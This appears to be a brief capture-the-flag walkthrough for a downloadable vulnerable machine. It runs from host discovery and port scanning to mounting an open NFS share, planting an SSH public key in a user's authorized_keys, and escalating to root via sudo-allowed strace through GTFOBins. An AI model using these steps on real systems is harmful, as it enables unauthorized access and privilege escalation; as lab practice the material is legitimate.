Download machine here
Let’s discover the machine IP with netdiscover.
Use nmap to scan for open ports.
Port 2049 NFS is open, let’s mount it.
Create a new directory and use the mount command
There are no interesting files.
Lets create a local ssh key on our machine.
sudo su
cd /root/.ssh
ssh-keygen -t rsa
#copy the rsa file to the tmp folder
cp id_rsa.pub /tmp
#Change the owner of the file
chown peter:peter /tmp/id_rsa.pub
#Switch to peter
su peter
#Copy the file into the mounted .ssh folder
cp /tmp/id_rsa.pub authorized_keys
Switch to root user and login via ssh
sudo -l
We can run /usr/bin/strace
as root.
Head to GTFOBins https://gtfobins.github.io/gtfobins/strace/